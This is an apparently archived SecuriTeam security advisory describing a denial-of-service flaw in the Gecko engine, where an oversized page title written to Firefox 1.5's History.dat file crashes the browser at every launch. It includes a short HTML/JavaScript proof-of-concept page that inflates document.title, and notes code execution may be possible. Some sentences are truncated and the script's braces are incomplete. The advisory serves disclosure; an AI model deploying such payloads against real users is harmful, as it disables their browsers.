[NEWS] Gecko Engine Multiple Vendor DoS (History.dat)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.

- - - - - - - - -

Gecko Engine Multiple Vendor DoS (History.dat)


<http://www.mozilla.org/newlayout/> Gecko is :the open source web browser
layout engine used in all Mozilla-branded software and its derivatives,
including later Netscape releases. Written in C++, Gecko is designed to
support open Internet standards. Originally created by Netscape
Communications Corporation, its development is now overseen by the Mozilla

A vulnerability in Gecko's reading History.dat file allows remote
attackers to cause the program to freeze, thus causing a denial of


A denial of service vulnerability exists in Gecko's handling of user URL
visiting history data. The History.dat file stores visited URL and is read
when the engine start. When a remarkably large URL is inserted into
History.dat file, the browser will crash on start. This can be exploited
by malicious people by persuading a user to visit a specially crafted web

Proof of Concept:
< !-- Firefox 1.5 buffer overflow

Basically firefox logs all kinda of URL data in it's history.dat file,
this little script will set a really large topic and Firefox will then
save that topic into it's history.dat.. The next time that firefox is
opened, it will instantly crash due to a buffer overflow -- this will
happen everytime until you manually delete the history.dat file -- which
most users won't figure out.

this proof of concept will only prevent someone from reopening
their browser after being exploited. DoS if you will. however, code
execution is possible with some modifcations.

Tested with Firefox 1.5 on Windows XP SP2.

ZIPLOCK < sickbeatz@xxxxxxxxx>

< html>< head>< title>heh< /title>< script type="text/javascript">
function ex() {
var buffer = "";
for (var i = 0; i < 5000; i++) {
buffer += "A";
var buffer2 = buffer;
for (i = 0; i < 500; i++) {
buffer2 += buffer;
document.title = buffer2;
< /script>< /head>< body>ZIPLOCK says < a href="javascript:ex();">CLICK ME
< /a>< /body>< /html>


The information has been provided by <mailto:sickbeatz@xxxxxxxxx>


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.